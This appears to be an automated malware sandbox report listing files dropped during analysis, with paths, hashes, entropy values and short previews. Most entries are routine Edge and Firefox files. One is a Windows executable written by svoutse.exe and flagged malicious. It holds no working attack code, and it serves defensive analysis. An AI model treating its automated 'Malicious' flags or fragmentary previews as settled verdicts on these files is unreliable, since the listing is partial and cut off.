Preview:	'use strict';function aa(){return function(){}}function l(a){return function(){return this[a]}}var n;function ba(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var ca="function"==typeof Object.defineProperties?Object.defineProperty:function(a,b,c){if(a==Array.prototype\|\|a==Object.prototype)return a;a[b]=c.value;return a};.function da(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var q=da(this);function r(a,b){if(b)a:{var c=q;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&null!=b&&ca(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new TypeError("Symbol is not a constructor");return new c(d+(f\|\|"")+"_"+e++,f)}function c(f,

C:\Users\user\AppData\Local\Temp\scoped_dir2628_1179938286\CRX_INSTALL\page_embed_script.js

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	291
Entropy (8bit):	4.65176400421739
Encrypted:	false
SSDEEP:	6:2LGX86tj66rU8j6D3bWq2un/XBtzHrH9Mnj63LK603:2Q8KVqb2u/Rt3Onj1
MD5:	3AB0CD0F493B1B185B42AD38AE2DD572
SHA1:	079B79C2ED6F67B5A5BD9BC8C85801F96B1B0F4B
SHA-256:	73E3888CCBC8E0425C3D2F8D1E6A7211F7910800EEDE7B1E23AD43D3B21173F7
SHA-512:	32F9DB54654F29F39D49F7A24A1FC800DBC0D4A8A1BAB2369C6F9799BC6ADE54962EFF6010EF6D6419AE51D5B53EC4B26B6E2CDD98DEF7CC0D2ADC3A865F37D3
Malicious:	false
Preview:	(function(){window._docs_chrome_extension_exists=!0;window._docs_chrome_extension_features_version=2;window._docs_chrome_extension_permissions="alarms clipboardRead clipboardWrite storage unlimitedStorage offscreen".split(" ");window._docs_chrome_extension_manifest_version=3;}).call(this);.

C:\Users\user\AppData\Local\Temp\scoped_dir2628_1179938286\CRX_INSTALL\service_worker_bin_prod.js

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with very long lines (4369)
Category:	dropped
Size (bytes):	103988
Entropy (8bit):	5.389407461078688
Encrypted:	false
SSDEEP:	1536:oXWJmOMsz9UqqRtjWLqj74SJf2VsxJ5BGOzr61SfwKmWGMJOaAFlObQ/x0BGm:yRqr6v3JnVzr6wwfMtkFSYm
MD5:	EA946F110850F17E637B15CF22B82837
SHA1:	8D27C963E76E3D2F5B8634EE66706F95F000FCAF
SHA-256:	029DFE87536E8907A612900B26EEAA72C63EDF28458A7227B295AE6D4E2BD94C
SHA-512:	5E8E61E648740FEF2E89A035A4349B2E4E5E4E88150EE1BDA9D4AD8D75827DC67C1C95A2CA41DF5B89DE8F575714E1A4D23BDE2DC3CF21D55DB3A39907B8F820
Malicious:	false
Preview:	'use strict';function k(){return function(){}}function n(a){return function(){return this[a]}}var q;function aa(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var ba="function"==typeof Object.defineProperties?Object.defineProperty:function(a,b,c){if(a==Array.prototype\|\|a==Object.prototype)return a;a[b]=c.value;return a};.function da(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var r=da(this);function t(a,b){if(b)a:{var c=r;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&null!=b&&ba(c,a,{configurable:!0,writable:!0,value:b})}}.t("Symbol",function(a){function b(f){if(this instanceof b)throw new TypeError("Symbol is not a constructor");return new c(d+(f\|\|"")+"_"+e++,f)}function c(f,g

C:\Users\user\AppData\Local\Temp\scoped_dir2628_506843968\1cb22868-f08a-4db4-8402-e803b51208da.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Google Chrome extension, version 3
Category:	dropped
Size (bytes):	11185
Entropy (8bit):	7.951995436832936
Encrypted:	false
SSDEEP:	192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
MD5:	78E47DDA17341BED7BE45DCCFD89AC87
SHA1:	1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
SHA-256:	67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
SHA-512:	9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
Malicious:	false
Preview:	Cr24..............0.."0....H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0....H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G

C:\Users\user\AppData\Local\Temp\scoped_dir2628_506843968\CRX_INSTALL\_metadata\verified_contents.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1753
Entropy (8bit):	5.8889033066924155
Encrypted:	false
SSDEEP:	48:Pxpr7Xka2NXDpfsBJODI19Kg1JqcJW9O//JE3ZBDcpu/x:L3XgNSz9/4kIO3u3Xgpq
MD5:	738E757B92939B24CDBBD0EFC2601315
SHA1:	77058CBAFA625AAFBEA867052136C11AD3332143
SHA-256:	D23B2BA94BA22BBB681E6362AE5870ACD8A3280FA9E7241B86A9E12982968947
SHA-512:	DCA3E12DD5A9F1802DB6D11B009FCE2B787E79B9F730094367C9F26D1D87AF1EA072FF5B10888648FB1231DD83475CF45594BB0C9915B655EE363A3127A5FFC2
Malicious:	false
Preview:	[.. {.. "description": "treehash per file",.. "signed_content": {.. "payload": "eyJpdGVtX2lkIjoiam1qZmxnanBjcGVwZWFmbW1nZHBma29na2doY3BpaGEiLCJpdGVtX3ZlcnNpb24iOiIxLjIuMSIsInByb3RvY29sX3ZlcnNpb24iOjEsImNvbnRlbnRfaGFzaGVzIjpbeyJmb3JtYXQiOiJ0cmVlaGFzaCIsImRpZ2VzdCI6InNoYTI1NiIsImJsb2NrX3NpemUiOjQwOTYsImhhc2hfYmxvY2tfc2l6ZSI6NDA5NiwiZmlsZXMiOlt7InBhdGgiOiJjb250ZW50LmpzIiwicm9vdF9oYXNoIjoiQS13R1JtV0VpM1lybmxQNktneUdrVWJ5Q0FoTG9JZnRRZGtHUnBEcnp1QSJ9LHsicGF0aCI6ImNvbnRlbnRfbmV3LmpzIiwicm9vdF9oYXNoIjoiVU00WVRBMHc5NFlqSHVzVVJaVTFlU2FBSjFXVENKcHhHQUtXMGxhcDIzUSJ9LHsicGF0aCI6Im1hbmlmZXN0Lmpzb24iLCJyb290X2hhc2giOiJKNXYwVTkwRmN0ejBveWJMZmZuNm5TbHFLU0h2bHF2YkdWYW9FeWFOZU1zIn1dfV19",.. "signatures": [.. {.. "header": {.. "kid": "publisher".. },.. "protected": "eyJhbGciOiJSUzI1NiJ9",.. "signature": "UglEEilkOml5P1W0X6wc-_dB87PQB73uMir11923av57zPKujb4IUe_lbGpn7cRZsy6x-8i9eEKxAW7L2TSmYqrcp4XtiON6ppcf27FWACXOUJDax9wlMr-EOtyZhykCnB9vR

C:\Users\user\AppData\Local\Temp\scoped_dir2628_506843968\CRX_INSTALL\content.js

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Unicode text, UTF-8 text, with very long lines (8031), with no line terminators
Category:	dropped
Size (bytes):	9815
Entropy (8bit):	6.1716321262973315
Encrypted:	false
SSDEEP:	192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3zEScQZBMX:+ThBVq3npozftROQIyVfjRZGB365Ey97
MD5:	3D20584F7F6C8EAC79E17CCA4207FB79
SHA1:	3C16DCC27AE52431C8CDD92FBAAB0341524D3092
SHA-256:	0D40A5153CB66B5BDE64906CA3AE750494098F68AD0B4D091256939EEA243643
SHA-512:	315D1B4CC2E70C72D7EB7D51E0F304F6E64AC13AE301FD2E46D585243A6C936B2AD35A0964745D291AE9B317C316A29760B9B9782C88CC6A68599DB531F87D59
Malicious:	false
Preview:	(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr

C:\Users\user\AppData\Local\Temp\scoped_dir2628_506843968\CRX_INSTALL\content_new.js

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Unicode text, UTF-8 text, with very long lines (8604), with no line terminators
Category:	dropped
Size (bytes):	10388
Entropy (8bit):	6.174387413738973
Encrypted:	false
SSDEEP:	192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3EbmE1F4fn:+ThBVq3npozftROQIyVfjRZGB365Ey9+
MD5:	3DE1E7D989C232FC1B58F4E32DE15D64
SHA1:	42B152EA7E7F31A964914F344543B8BF14B5F558
SHA-256:	D4AA4602A1590A4B8A1BCE8B8D670264C9FB532ADC97A72BC10C43343650385A
SHA-512:	177E5BDF3A1149B0229B6297BAF7B122602F7BD753F96AA41CCF2D15B2BCF6AF368A39BB20336CCCE121645EC097F6BEDB94666C74ACB6174EB728FBFC43BC2A
Malicious:	false
Preview:	(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr

C:\Users\user\AppData\Local\Temp\scoped_dir2628_506843968\CRX_INSTALL\manifest.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	962
Entropy (8bit):	5.698567446030411
Encrypted:	false
SSDEEP:	24:1Hg9+D3DRnbuF2+sUrzUu+Y9VwE+Fg41T1O:NBqY+6E+F7JO
MD5:	E805E9E69FD6ECDCA65136957B1FB3BE
SHA1:	2356F60884130C86A45D4B232A26062C7830E622
SHA-256:	5694C91F7D165C6F25DAF0825C18B373B0A81EA122C89DA60438CD487455FD6A
SHA-512:	049662EF470D2B9E030A06006894041AE6F787449E4AB1FBF4959ADCB88C6BB87A957490212697815BB3627763C01B7B243CF4E3C4620173A95795884D998A75
Malicious:	false
Preview:	{.. "content_scripts": [ {.. "js": [ "content.js" ],.. "matches": [ "https://chrome.google.com/webstore/" ].. }, {.. "js": [ "content_new.js" ],.. "matches": [ "https://chromewebstore.google.com/" ].. } ],.. "description": "Edge relevant text changes on select websites to improve user experience and precisely surfaces the action they want to take.",.. "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu06p2Mjoy6yJDUUjCe8Hnqvtmjll73XqcbylxFZZWe+MCEAEK+1D0Nxrp0+IuWJL02CU3jbuR5KrJYoezA36M1oSGY5lIF/9NhXWEx5GrosxcBjxqEsdWv/eDoOOEbIvIO0ziMv7T1SUnmAA07wwq8DXWYuwlkZU/PA0Mxx0aNZ5+QyMfYqRmMpwxkwPG8gyU7kmacxgCY1v7PmmZo1vSIEOBYrxl064w5Q6s/dpalSJM9qeRnvRMLsszGY/J2bjQ1F0O2JfIlBjCOUg/89+U8ZJ1mObOFrKO4um8QnenXtH0WGmsvb5qBNrvbWNPuFgr2+w5JYlpSQ+O8zUCb8QZwIDAQAB",.. "manifest_version": 3,.. "name": "Edge relevant text changes",.. "update_url": "https://edge.microsoft.com/extensionwebstorebase/v1/crx",.. "version": "1.2.1"..}..

C:\Users\user\AppData\Local\Temp\tmpaddon

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	453023
Entropy (8bit):	7.997718157581587
Encrypted:	true
SSDEEP:	12288:tESTeqTI2r4ZbCgUKWKNeRcPMb6qlV7hVZe3:tEsed2Xh9/bdzZe3
MD5:	85430BAED3398695717B0263807CF97C
SHA1:	FFFBEE923CEA216F50FCE5D54219A188A5100F41
SHA-256:	A9F4281F82B3579581C389E8583DC9F477C7FD0E20C9DFC91A2E611E21E3407E
SHA-512:	06511F1F6C6D44D076B3C593528C26A602348D9C41689DBF5FF716B671C3CA5756B12CB2E5869F836DEDCE27B1A5CFE79B93C707FD01F8E84B620923BB61B5F1
Malicious:	false
Preview:	PK.........bN...R..........gmpopenh264.dll..\|.E.0.=..I.....1....4f1q.`.........q.....'+....hm{.z..o_.{w........$..($A!...\|L...B&A2.s.{..Dd......c.U.U..9u.S...K.l`...../.d.-....\|.....&....9......wn..x......i.#O.+.Y.l......+....,3.3f..\..c.SSS,............N...GG...F.'.&.:'.K.Z&.>.@.g..M...M.`............ZR....^jg.G.Kb.o~va.....<Z..1.#.O.e.....D..X..i..$imBW..Q&.......P.....,M.,..:.c...-...\...........-i.K.I..4.a..6.....Ov=...W..F.CH.>...a.'.x...#@f...d..u.1....OV.1o}....g.5.._.3.J.Hi.Z.ipM....b.Z....%.G..F................/..3.q..J.....o...%.g.N..}..).3.N%.!..q........^I.m..~...6.#.~+.....A...I]r...x...<IYj....p0..`S.M@.E..f.=.;!.@.....E..E....... .0.n....Jd..d......uM.-.qI.lR..z..=}..r.D.XLZ....x.$..\|c.1.cUkM.&.Qn]..a]t.h...!.6 7..Jd.DvKJ"Wgd*%n...w...Jni.inmr.@M.$'Z.s....#)%..Rs..:.h....R....\..t.6..'.g.........Uj+F.cr:\|..!..K.W.Y...17......,....r.....>.N..3.R.Y.._\...Ir.DNJdM... .k...&V-....z.%...-...D..i..&...6....7.2T).>..0..%.&.

C:\Users\user\AppData\Roaming\1000026000\76251a0626.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1756672
Entropy (8bit):	7.943588852882703
Encrypted:	false
SSDEEP:	49152:FQjnjryZ10oGRS+PIY6ST7lzrXYvIo4FeCmAyOEK+Ywz8rFfcTZQU:mPrQqoGnIZST7l/XoIPm/U5fcTZQU
MD5:	6976C4A250BCFEE1F7CCF3B3DD7CEF7B
SHA1:	78BBB7655F929908B312F4F9DA1C817C50E792E3
SHA-256:	AB5F78EACCC4A0F86106C547F828C2DA8BD554A855DEDA50074C8A3CD003513A
SHA-512:	CDDEE238F52470483893829C810B901CE793C5838C54107B12EAAD1002B4491A2ED0E301829176C94FB820A0BD034A47CB8F3E3C95F0365A7CD72F683CE28359
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 34%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b...............u^......uk......u_......{v.....fz.......{f..............uZ......uh.....Rich............PE..L...M..f.....................B"......`f...........@...........................f......A....@.................................P.#.d.............................#..................................................................................... . ..#......<..................@....rsrc ......#......L..............@....idata ......#......L..............@... ..(...$......N..............@...dnbdzjvd.`....L..X...P..............@...hwzrywcd.....Pf.....................@....taggant.0...`f.."..................@...................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\ExperimentStoreData.json (copy)

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	4514
Entropy (8bit):	4.943015742128215
Encrypted:	false
SSDEEP:	96:8S+OcaPUFqOdwNIOdvtkeQjvYZUBLXA8P:8S+Oc+UAOdwiOdKeQjDLXA8P
MD5:	808091BC039C8534A200BDCB71E0F131
SHA1:	A23E372B9B7A134FB4009682F04CB7F320F61AC9
SHA-256:	4A501F1FE8CD9693CD71E6D1843B123CE196BD7B13AF0537642B7E1FE97C9024
SHA-512:	51718EADF10F4B032E174109C03D6CF06BDAF56E32BE97DE54DC32F456C565E2D0B965964ACEB12CBF76CA69E95292C64347B21C6B56951C54DD27894B0EB78A
Malicious:	false
Preview:	{"csv-import-release-rollout":{"slug":"csv-import-release-rollout","branch":{"slug":"enable-csv-import","ratio":1,"feature":{"value":{},"enabled":false,"featureId":"this-is-included-for-desktop-pre-95-support"},"features":[{"value":{"csvImport":true},"enabled":true,"featureId":"cm-csv-import"}]},"active":true,"enrollmentId":"d14ccc2f-033b-49c7-a2e0-d7a247e302f1","experimentType":"rollout","source":"rs-loader","userFacingName":"CSV Import (Release Rollout)","userFacingDescription":"This rollout enables users to import logins from a CSV file from the about:logins page.","lastSeen":"2023-10-05T07:41:33.819Z","featureIds":["cm-csv-import"],"prefs":[{"name":"signon.management.page.fileImport.enabled","branch":"default","featureId":"cm-csv-import","variable":"csvImport","originalValue":false}],"isRollout":true},"mixed-content-level-2-roll-out-release-113":{"slug":"mixed-content-level-2-roll-out-release-113","branch":{"slug":"control","ratio":1,"feature":{"value":{},"enabled":false,"featureId

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\ExperimentStoreData.json.tmp

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	4514
Entropy (8bit):	4.943015742128215
Encrypted:	false
SSDEEP:	96:8S+OcaPUFqOdwNIOdvtkeQjvYZUBLXA8P:8S+Oc+UAOdwiOdKeQjDLXA8P
MD5:	808091BC039C8534A200BDCB71E0F131
SHA1:	A23E372B9B7A134FB4009682F04CB7F320F61AC9
SHA-256:	4A501F1FE8CD9693CD71E6D1843B123CE196BD7B13AF0537642B7E1FE97C9024
SHA-512:	51718EADF10F4B032E174109C03D6CF06BDAF56E32BE97DE54DC32F456C565E2D0B965964ACEB12CBF76CA69E95292C64347B21C6B56951C54DD27894B0EB78A
Malicious:	false
Preview:	{"csv-import-release-rollout":{"slug":"csv-import-release-rollout","branch":{"slug":"enable-csv-import","ratio":1,"feature":{"value":{},"enabled":false,"featureId":"this-is-included-for-desktop-pre-95-support"},"features":[{"value":{"csvImport":true},"enabled":true,"featureId":"cm-csv-import"}]},"active":true,"enrollmentId":"d14ccc2f-033b-49c7-a2e0-d7a247e302f1","experimentType":"rollout","source":"rs-loader","userFacingName":"CSV Import (Release Rollout)","userFacingDescription":"This rollout enables users to import logins from a CSV file from the about:logins page.","lastSeen":"2023-10-05T07:41:33.819Z","featureIds":["cm-csv-import"],"prefs":[{"name":"signon.management.page.fileImport.enabled","branch":"default","featureId":"cm-csv-import","variable":"csvImport","originalValue":false}],"isRollout":true},"mixed-content-level-2-roll-out-release-113":{"slug":"mixed-content-level-2-roll-out-release-113","branch":{"slug":"control","ratio":1,"feature":{"value":{},"enabled":false,"featureId

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\addonStartup.json.lz4 (copy)

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	Mozilla lz4 compressed data, originally 23432 bytes
Category:	dropped
Size (bytes):	5318
Entropy (8bit):	6.62067557672702
Encrypted:	false
SSDEEP:	96:V2YbKsKNU2xWrp327tGmD4wBON6h6cHaJVJuZMd0JGkkrwLUe:VTx2x2t0FDJ4NpwZMd0EJwLv
MD5:	A0DD0256A122A64D1C1A98C36F89F368
SHA1:	B82AF63B4A4261477DA4CD2AC34B4DD7BB5EBEA0
SHA-256:	EE9278644D02739D27E4FD9D8006AD49D9A0D80AD251BA2C3F144A408F65A9F3
SHA-512:	ED3AE377C1AD9E6694307CC60554665058541DD2BB80FEB1832616ACE39623E842DB3CD9153771ABD1874703DCBF4B81CABE050E2F2553D723A96A163AA41911
Malicious:	false
Preview:	mozLz40..[....{"app-system-defaults":{"addon....formautofill@mozilla.org&..Gdependencies":[],"enabled":true,"lastModifiedTime":1695865283000,"loader":null,"path":s.....xpi","recommendationStateA...rootURI":"jar:file:///C:/Program%20Files/M.......refox/browser/features/...... !/...unInSafeMode..wsignedD...telemetryKey..7%40R...:1.0.1","version":"..`},"pic..#in.....T.n..w...........S.......(.[......0....0"},"screenshots..T.r.....[.......(.V....-39.......},"webcompat-reporter...Ofals..&.z.....[.......(.]....=1.5.............<.)....p....d......1.z.!18...5.....startupData...pX.astentL..!er...webRequest%..onBefore...[[{"incognitoi.UtabId..!yp...."main_frame"],"url...."://login.microsoftonline.com/","..@us/L.dwindows...},["blocking"]],...Iimag...https://smartT.".f.....etp/facebook.svg",...Aplay....8`script...P.....-....-testbed.herokuapp\.`shims_..3.jsh.bexampl\|.......Pexten{..Q../?..s...S.J/_2..@&_3U..s7.addthis . ic...officialK......-angularjs/current/dist(..t.min.js...track.adB...net/s

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\addonStartup.json.lz4.tmp

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	Mozilla lz4 compressed data, originally 23432 bytes
Category:	dropped
Size (bytes):	5318
Entropy (8bit):	6.62067557672702
Encrypted:	false
SSDEEP:	96:V2YbKsKNU2xWrp327tGmD4wBON6h6cHaJVJuZMd0JGkkrwLUe:VTx2x2t0FDJ4NpwZMd0EJwLv
MD5:	A0DD0256A122A64D1C1A98C36F89F368
SHA1:	B82AF63B4A4261477DA4CD2AC34B4DD7BB5EBEA0
SHA-256:	EE9278644D02739D27E4FD9D8006AD49D9A0D80AD251BA2C3F144A408F65A9F3
SHA-512:	ED3AE377C1AD9E6694307CC60554665058541DD2BB80FEB1832616ACE39623E842DB3CD9153771ABD1874703DCBF4B81CABE050E2F2553D723A96A163AA41911
Malicious:	false
Preview:	mozLz40..[....{"app-system-defaults":{"addon....formautofill@mozilla.org&..Gdependencies":[],"enabled":true,"lastModifiedTime":1695865283000,"loader":null,"path":s.....xpi","recommendationStateA...rootURI":"jar:file:///C:/Program%20Files/M.......refox/browser/features/...... !/...unInSafeMode..wsignedD...telemetryKey..7%40R...:1.0.1","version":"..`},"pic..#in.....T.n..w...........S.......(.[......0....0"},"screenshots..T.r.....[.......(.V....-39.......},"webcompat-reporter...Ofals..&.z.....[.......(.]....=1.5.............<.)....p....d......1.z.!18...5.....startupData...pX.astentL..!er...webRequest%..onBefore...[[{"incognitoi.UtabId..!yp...."main_frame"],"url...."://login.microsoftonline.com/","..@us/L.dwindows...},["blocking"]],...Iimag...https://smartT.".f.....etp/facebook.svg",...Aplay....8`script...P.....-....-testbed.herokuapp\.`shims_..3.jsh.bexampl\|.......Pexten{..Q../?..s...S.J/_2..@&_3U..s7.addthis . ic...officialK......-angularjs/current/dist(..t.min.js...track.adB...net/s

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\addons.json (copy)

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	24
Entropy (8bit):	3.91829583405449
Encrypted:	false
SSDEEP:	3:YWGifTJE6iHQ:YWGif9EE
MD5:	3088F0272D29FAA42ED452C5E8120B08
SHA1:	C72AA542EF60AFA3DF5DFE1F9FCC06C0B135BE23
SHA-256:	D587CEC944023447DC91BC5F71E2291711BA5ADD337464837909A26F34BC5A06
SHA-512:	B662414EDD6DEF8589304904263584847586ECCA0B0E6296FB3ADB2192D92FB48697C99BD27C4375D192150E3F99102702AF2391117FFF50A9763C74C193D798
Malicious:	false
Preview:	{"schema":6,"addons":[]}

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\addons.json.tmp

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	24
Entropy (8bit):	3.91829583405449
Encrypted:	false
SSDEEP:	3:YWGifTJE6iHQ:YWGif9EE
MD5:	3088F0272D29FAA42ED452C5E8120B08
SHA1:	C72AA542EF60AFA3DF5DFE1F9FCC06C0B135BE23
SHA-256:	D587CEC944023447DC91BC5F71E2291711BA5ADD337464837909A26F34BC5A06
SHA-512:	B662414EDD6DEF8589304904263584847586ECCA0B0E6296FB3ADB2192D92FB48697C99BD27C4375D192150E3F99102702AF2391117FFF50A9763C74C193D798
Malicious:	false
Preview:	{"schema":6,"addons":[]}

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\extensions.json (copy)

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	36830
Entropy (8bit):	5.186376962556299
Encrypted:	false
SSDEEP:	768:NI40vfXXQ4z6X4n44a4T4h4b4rhEhvj4Lw4m4x44g:NJhWvx
MD5:	C2A8F76D683C9F86054CA7775732A180
SHA1:	FB1F8B84825D53E58290E53D65F8A73C5794E281
SHA-256:	4744AACB03666A594CF1BB6E6491105F0AB600259D8E0BA483164F2AE9C90221
SHA-512:	F804B8CF7277D2F6E8AA8BDFFF099ECCEC00CE59FEB3F3EB47D5E4B36FBB2C23466233C966F53483F0DF365E13AB9BB9256B685645FC366A5A24C72907E54025
Malicious:	false
Preview:	{"schemaVersion":35,"addons":[{"id":"formautofill@mozilla.org","syncGUID":"{9f54712e-79e2-445b-974a-266a0185f206}","version":"1.0.1","type":"extension","loader":null,"updateURL":null,"installOrigins":null,"manifestVersion":2,"optionsURL":null,"optionsType":null,"optionsBrowserStyle":true,"aboutURL":null,"defaultLocale":{"name":"Form Autofill","creator":null,"developers":null,"translators":null,"contributors":null},"visible":true,"active":true,"userDisabled":false,"appDisabled":false,"embedderDisabled":false,"installDate":1695865283000,"updateDate":1695865283000,"applyBackgroundUpdates":1,"path":"C:\\Program Files\\Mozilla Firefox\\browser\\features\\formautofill@mozilla.org.xpi","skinnable":false,"sourceURI":null,"releaseNotesURI":null,"softDisabled":false,"foreignInstall":false,"strictCompatibility":true,"locales":[],"targetApplications":[{"id":"toolkit@mozilla.org","minVersion":null,"maxVersion":null}],"targetPlatforms":[],"signedDate":null,"seen":true,"dependencies":[],"incognito":"

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\extensions.json.tmp

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	36830
Entropy (8bit):	5.186376962556299
Encrypted:	false
SSDEEP:	768:NI40vfXXQ4z6X4n44a4T4h4b4rhEhvj4Lw4m4x44g:NJhWvx
MD5:	C2A8F76D683C9F86054CA7775732A180
SHA1:	FB1F8B84825D53E58290E53D65F8A73C5794E281
SHA-256:	4744AACB03666A594CF1BB6E6491105F0AB600259D8E0BA483164F2AE9C90221
SHA-512:	F804B8CF7277D2F6E8AA8BDFFF099ECCEC00CE59FEB3F3EB47D5E4B36FBB2C23466233C966F53483F0DF365E13AB9BB9256B685645FC366A5A24C72907E54025
Malicious:	false
